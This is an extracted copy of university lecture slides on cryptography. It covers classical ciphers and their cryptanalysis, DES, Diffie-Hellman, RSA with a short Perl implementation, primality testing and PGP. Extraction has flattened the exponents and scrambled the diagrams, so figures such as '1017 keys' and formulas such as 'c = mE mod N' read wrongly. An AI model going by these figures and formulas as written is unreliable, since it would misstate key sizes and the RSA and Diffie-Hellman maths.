![Page 326: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/326.jpg)
Symmetric key systems
XPKi[P]P
X(Plaintext)(Plaintext)
KiKi
CS3235 - Hugh Anderson’s notes. Page number: 325
![Page 327: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/327.jpg)
Simple ciphers - transposition
Transposition ciphers just re-order the letters of the originalmessage. This is known as an anagram:
• parliament is an anagram of partial men
• Eleven plus two is an anagram of Twelve plus one
Perhaps you would like to see if you can unscramble “ageprison”, or “try open”.
CS3235 - Hugh Anderson’s notes. Page number: 326
![Page 328: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/328.jpg)
Transposition
Detect a transposition cipher with the frequencies of theletters, and letter pairs.
If the frequency of single letters in ciphertext is correct,but the frequencies of letter pairs is wrong, then the ci-pher may be a transposition.
This sort of analysis can also assist in unscrambling atransposition ciphertext, by arranging the letters in theirletter pairs.
CS3235 - Hugh Anderson’s notes. Page number: 327
![Page 329: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/329.jpg)
Simple ciphers - substitution
Substitution cipher systems encode the input stream us-ing a substitution rule.
The Cæsar cipher is an example of a simple substi-tution cipher system, but it can be cracked in at most25 attempts by just trying each of the 25 values in thekeyspace.
CS3235 - Hugh Anderson’s notes. Page number: 328
![Page 330: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/330.jpg)
Substitution
Code Encoding
A Q
B V
C X
D W
... ...
If the mapping was more randomly chosen it iscalled a monoalphabetic substitution cipher, and thekeyspace for encoding 26 letters would be 26! − 1 =403, 291, 461, 126, 605, 635, 583, 999, 999.
CS3235 - Hugh Anderson’s notes. Page number: 329
![Page 331: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/331.jpg)
Substitution
If we could decrypt 1, 000, 000 messages in a second,then the average time to find a solution would be about6, 394, 144, 170, 576 years!
We might be lulled into a sense of security by these bignumbers, but of course this sort of cipher can be subjectto frequency analysis.
CS3235 - Hugh Anderson’s notes. Page number: 330
![Page 332: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/332.jpg)
Frequency analysis
In the English language, the most common letters are: "E TA O N I S H R D L U..." (from most to least common), andwe may use the frequency of the encrypted data to makegood guesses at the original plaintext.
We may also look for digrams and trigrams (th, the).
CS3235 - Hugh Anderson’s notes. Page number: 331
![Page 333: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/333.jpg)
Vigenère
The Vigenère cipher is a polyalphabetic substitution ci-pher invented around 1520.
We use an encoding/decoding sheet, called a tableau,and a keyword or key sequence.
CS3235 - Hugh Anderson’s notes. Page number: 332
![Page 334: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/334.jpg)
Vigenère
A B C D E F G H ...
A A B C D E F G H ...
B B C D E F G H I ...
C C D E F G H I J ...
D D E F G H I J K ...
E E F G H I J K L ...
F F G H I J K L M ...
G G H I J K L M N ...
H H I J K L M N O ...
... ... ... ... ... ... ... ... ... ...
CS3235 - Hugh Anderson’s notes. Page number: 333
![Page 335: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/335.jpg)
Vigenère
If our keyword was BAD, then encoding HAD A FEED wouldresult in
Key B A D B A D B A
Text H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.
CS3235 - Hugh Anderson’s notes. Page number: 334
![Page 336: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/336.jpg)
Analysis
The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key
IC =1
N(N − 1)
25∑
i=0
Fi(Fi − 1)
where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.
CS3235 - Hugh Anderson’s notes. Page number: 335
![Page 337: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/337.jpg)
Index of coincidence
#!/usr/bin/perl$skip=$ARGV[0] ;@text=<stdin> ;$all=join(”,@text) ;$all =~ tr/a-z/A-Z/ ;$all =~ tr/A-Z//cd ;$header=substr($all,0,$skip) ;$shifted = substr($all,$skip).$header ;@alltxt=split(//,$all) ; @shiftxt=split(//,$shifted) ;foreach $i(0..$#alltxt)
if($alltxt[$i] eq $shiftxt[$i]) $count++ ;printf("Index of Coincidence is: %2f\n",$count/$#alltxt) ;
Show analysis using shifts of 1...2...3...
CS3235 - Hugh Anderson’s notes. Page number: 336
![Page 338: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/338.jpg)
Index of coincidence
The ideas here were developed by William F. Friedmanin his Ph.D.
Friedman also coined the words “cryptanalysis” and“cryptology”.
Friedman worked on the solution of German code sys-tems during the first (1914-1918) world war, and later be-came a world-renowned cryptologist.
CS3235 - Hugh Anderson’s notes. Page number: 337
![Page 339: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/339.jpg)
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 338
![Page 340: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/340.jpg)
S-box
4:22:4 Permutation
(3,4,2,1)
CS3235 - Hugh Anderson’s notes. Page number: 339
![Page 341: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/341.jpg)
S-boxes and P-boxes
The S-box (Substitution-Box) is a hardware device whichencodes n bit numbers to other n bit numbers and canbe represented by a permutation.
A P-box is just a simple permutation box.
If you use an S-box and a P-box at once, you have aproduct cipher which is generally harder to decode.
CS3235 - Hugh Anderson’s notes. Page number: 340
![Page 342: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/342.jpg)
DES - Data Encryption Standard
DES was first proposed by IBM using 128 bit keys, butits security was reduced by NSA (the National SecurityAgency) to a 56 bit key.
At 1ms/GUESS. It would take 1080 years to solve 128 bitkey encryption.
The DES Standard gave a business level of safety, andis a product cipher.
CS3235 - Hugh Anderson’s notes. Page number: 341
![Page 343: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/343.jpg)
DES - Data Encryption Standard
The (shared) 56 bit key is used to generate 16 subkeys,which each control a sequenced P-box or S-box stage.
DES works on 64 bit messages called blocks.
If you intercept the key, you can decode the message.
However, there are about 1017 keys.
CS3235 - Hugh Anderson’s notes. Page number: 342
![Page 344: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/344.jpg)
Feistel
+ f
+ f
+ f
+ f
+ f
+ f
K2
K1
K0
K1
K0
K2
l0 r0
l0 r0
l1 r1
l2 r2
l3 r3
l3 r3
l2 r2
l1 r1
Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.
CS3235 - Hugh Anderson’s notes. Page number: 343
![Page 345: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/345.jpg)
DES modes of operation
The US government specifically recommends not usingthe weakest simplest mode for messages, the ElectronicCodebook (ECB) mode.
They recommend the stronger and more complex CipherFeedback (CFB) or Cipher Block Chaining (CBC) modes.
The CBC mode XORs the next 64-bit block with the resultof the previous 64-bit encryption, and is more difficult toattack.
CS3235 - Hugh Anderson’s notes. Page number: 344
![Page 346: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/346.jpg)
DES modes of operation
DES
Ctext
msg
Electronic Code Book
DES
Ctext
msg
DES
Ctext
msg
Cipher Block Chaining
Initial vector
CS3235 - Hugh Anderson’s notes. Page number: 345
![Page 347: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/347.jpg)
DES software
DES is available as a library on both UNIX and Microsoft-based systems. There is typically a des.h file, which mustbe included in any C source using the DES library:
#include “des.h”//// - Your calls
CS3235 - Hugh Anderson’s notes. Page number: 346
![Page 348: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/348.jpg)
DES software
After initialization of the DES engine, the library provides asystem call which can both encrypt and decrypt:
int des cbc encrypt(clear, cipher, schedule, encrypt)
where the encrypt parameter determines if we are to enci-pher or decipher.
The schedule contains the secret DES key.
CS3235 - Hugh Anderson’s notes. Page number: 347
![Page 349: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/349.jpg)
Case study: Amoeba capabilities
All Amoeba objects are identified by a capability stringwhich is encrypted using DES encryption. A capability islong enough so that you can’t just make them up.
If you have the string, you have whatever the capabilityallows you. If you want to give someone some access toa file, you can give them the capability string. They placethis in their directory, and can see the file.
CS3235 - Hugh Anderson’s notes. Page number: 348
![Page 350: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/350.jpg)
Case study: Amoeba capabilities
object
identify the objectthe server uses to
Internal number which
Identifies whichoperations are
(48 bits) (24 bits) (8 bits) (48 bits)
Protects against forging
allowedwhich manages the Identifies the server
CheckfieldRightsObject IDServer Port
To further prevent tampering, the capability is DES en-crypted. The resultant bit stream may be used directly, orconverted to and from an ASCII string with the a2c and c2acommands.
CS3235 - Hugh Anderson’s notes. Page number: 349
![Page 351: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/351.jpg)
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 350
![Page 352: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/352.jpg)
Public key systems
In 1976 Diffie and Hellman published the paper “New Di-rections in Cryptography”, which first introduced the ideaof public key cryptography.
Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.
For example, we have the discrete logarithm problem inwhich it is relatively easy to calculate n = gk mod p giveng, k and p, but difficult to calculate k in the same equation,given g, n and p.
CS3235 - Hugh Anderson’s notes. Page number: 351
![Page 353: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/353.jpg)
Diffie-Hellman key agreement
Two separated users create and share a secret key. A thirdparty is not realistically able to calculate the shared key.
g mod p
p,g
ba
p,g,a
b
Ted
BobAlicep,g,b
ag mod p
g mod pg mod p
bg mod pag mod p
CS3235 - Hugh Anderson’s notes. Page number: 352
![Page 354: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/354.jpg)
Knowledge different
• All participants know two system parameters p, and g
• Alice and Bob each have a secret value (Alice has a andBob has b)
• Alice and Bob each calculate and exchange a public key(ga mod p for Alice and gb mod p for Bob).
• Ted knows g, p, ga mod p and gb mod p, but not a or b.
CS3235 - Hugh Anderson’s notes. Page number: 353
![Page 355: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/355.jpg)
Diffie-Hellman key agreement
Both Alice and Bob can now calculate the value gab mod p.
1. Alice calculates (gb mod p)a mod p = (gb)a mod p.
2. Bob calculates (ga mod p)b mod p = (ga)b mod p.
And of course (gb)a mod p = (ga)b mod p = gab mod pwhich is the shared key.
CS3235 - Hugh Anderson’s notes. Page number: 354
![Page 356: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/356.jpg)
Diffie-Hellman key agreement
Ted has a much more difficult problem. It is difficult to cal-culate gab mod p without knowing either a or b. The algo-rithmic run-time of the (so-far best) algorithm for doing thisis in
O(ec√
r log r)
where c is small, but ≥ 1, and r is the number of bits in thenumber.
CS3235 - Hugh Anderson’s notes. Page number: 355
![Page 357: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/357.jpg)
Diffie-Hellman key agreement
By contrast, the enciphering and deciphering process maybe done in O(r):
Bit size Enciphering Discrete logarithm solution
10 10 23
100 100 1,386,282
1,000 1,000 612,700,000,000,000,000,000,000
CS3235 - Hugh Anderson’s notes. Page number: 356
![Page 358: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/358.jpg)
Encryption
(Plaintext)XX
P
K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)
K1[P]
K2
P
CS3235 - Hugh Anderson’s notes. Page number: 357
![Page 359: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/359.jpg)
Authentication
K2
XP
K1
PK1[J2[P]]
J1J2
XXX
CS3235 - Hugh Anderson’s notes. Page number: 358
![Page 360: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/360.jpg)
This session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 359
![Page 361: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/361.jpg)
RSA (Rivest, Shamir, Adelman)
This public key system relies on the difficult problem of try-ing to find the complete factorization of a large composite9
integer whose prime factors10 are not known.
9An integer larger than 1 is called composite if it has at least one divisor larger than1.
10The Fundamental Theorem of Arithmetic states that any integer N (greater than0) may be expressed uniquely as the product of prime numbers.
CS3235 - Hugh Anderson’s notes. Page number: 360
![Page 362: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/362.jpg)
RSA hacks
Two RSA-encrypted messages have been cracked:
• The inventors of RSA published a 129-digits (430 bits)RSA public key. In 1994, it was factored with 5000 MIPS-years of computing time.
• A year later, a 384-bit PGP key was cracked. It needed1300 MIPS-years to factor the key in three months.
Note that these efforts each only cracked a single RSA key.
CS3235 - Hugh Anderson’s notes. Page number: 361
![Page 363: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/363.jpg)
RSA hacks
If you happen to be able to factor the following number,please tell Hugh - we can split US$200,00011!
25195908475657893494027183240048398571429282126204032027777137836043662020707595556264018525880784406918290641249515082189298559149176184502808489120072844992687392807287776735971418347270261896375014971824691165077613379859095700097330459748808428401797429100642458691817195118746121515172654632282216869987549182422433637259085141865462043576798423387184774447920739934236584823824281198163815010674810451660377306056201619676256133844143603833904414952634432190114657544454178424020924616515723350778707749817125772467962926386356373289912154831438167899885040445364023527381951378636564391212010397122822120720357
11US$150,000 for me, US$50,000 for you...
CS3235 - Hugh Anderson’s notes. Page number: 362
![Page 364: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/364.jpg)
RSA coding algorithms
Below are outlined the four processes needed for RSA en-cryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
CS3235 - Hugh Anderson’s notes. Page number: 363
![Page 365: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/365.jpg)
To create public key Kp
1. Select two different large primes P and Q.
2. Assign x = (P − 1)(Q− 1). (Does this ring a bell?)
3. Choose E relative prime to x. (This must satisfy conditionfor Ks given later)
4. Assign N = P ∗Q.
5. Kp is N concatenated with E.
CS3235 - Hugh Anderson’s notes. Page number: 364
![Page 366: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/366.jpg)
To create private (secret) key Ks
1. Choose D: D ∗ E mod x = 1.
(a) (i.e. multiplicative inverses)(b) another way: DE = k(P − 1)(Q− 1) + 1
2. Ks is N concatenated with D.
CS3235 - Hugh Anderson’s notes. Page number: 365
![Page 367: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/367.jpg)
To encode plain text m
1. Pretend m is a number.
2. Calculate c = mE mod N .
CS3235 - Hugh Anderson’s notes. Page number: 366
![Page 368: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/368.jpg)
To decode c back to m
1. Calculate m = cD mod N .
2. ....WHY?....
CS3235 - Hugh Anderson’s notes. Page number: 367
![Page 369: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/369.jpg)
...Why?...
cD mod N = m
ED mod N
= mk(P−1)(Q−1)+1 mod PQ
= m ∗mk(P−1)(Q−1) modPQ
• mP−1 mod P = 1, so (m(P−1))k(Q−1) modP = 1
• mQ−1 mod Q = 1, and so (tutorial) (m(P−1))k(Q−1) modPQ = 1.
cD mod N = m
ED mod N
CS3235 - Hugh Anderson’s notes. Page number: 368
![Page 370: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/370.jpg)
RSA code
#!/usr/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj$/=unpack(’H*’,$ );$ =‘echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1lK[d2%Sa2/d0$^Ixp"|dc‘;s/\W//g;$ =pack(’H*’,/((..)*)$/)
and then
• echo "squeamish ossifrage" | ./rsa.perl -k=10001 -n=1967cb529 > msg.rsa
• ./rsa.perl -d -k=ac363601 -n=1967cb529 < msg.rsa
CS3235 - Hugh Anderson’s notes. Page number: 369
![Page 371: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/371.jpg)
Testing large numbers for primality
RSA requires us to generate large prime numbers, but thereis no algorithm for constructing arbitrarily large prime num-bers. Instead we use statistical testing methods to deter-mine primality.Quiz! Is 162, 259, 276, 829, 213, 363, 391, 578, 010, 288, 127prime12?After choosing a large random (odd) number p, we canquickly see if p is divisible by 2, 3 and so on (say all primesup to 1000). If our number p passes this, then we can per-form some sort of statistical primality test.
12Note that this is only a 33 digit number, and we typically use prime numbers withhundreds of digits.
CS3235 - Hugh Anderson’s notes. Page number: 370
![Page 372: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/372.jpg)
Lehmann test
1. Choose a random number w(for witness) less than p
2. If w(p−1)/2 6≡ ±1 mod p then p is not prime
3. If w(p−1)/2 ≡ ±1 mod p then the likelihood is less than 0.5that p is not prime
Repeat the test over and over, say n times. The likelihoodof a false positive will be less than 1
2n. Other tests, such asthe Rabin-Miller test may converge more quickly.
CS3235 - Hugh Anderson’s notes. Page number: 371
![Page 373: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/373.jpg)
Primes is in P!
Group at the Indian Institute of Technology have discov-ered the unexpected result that testing a number for pri-mality can be done in polynomial time, rather than usingprobabilistic tests as just shown.
This is unlikely to affect the effectiveness of public keysystems.
The paper is only 7 pages long and is beautifully writ-ten...
CS3235 - Hugh Anderson’s notes. Page number: 372
![Page 374: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/374.jpg)
Case study: PGP
PGP (Pretty Good Privacy) is a public key encryptionpackage to protect E-mail and data files.
It lets you communicate securely with people you’venever met, with no secure channels needed for prior ex-change of keys.
PGP can be used to append digital signatures to mes-sages, as well as encrypt the messages, or do both.
CS3235 - Hugh Anderson’s notes. Page number: 373
![Page 375: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/375.jpg)
Case study: PGP
It uses various schemes including patented ones likeIDEA and RSA.
The patent on IDEA allows non-commercial distribution,and the RSA patent has expired.
However there are also commercial versions of PGP.
PGP can use, for example, 2048 bit primes, and it is con-sidered unlikely that PGP with this level of encryption canbe broken.
CS3235 - Hugh Anderson’s notes. Page number: 374
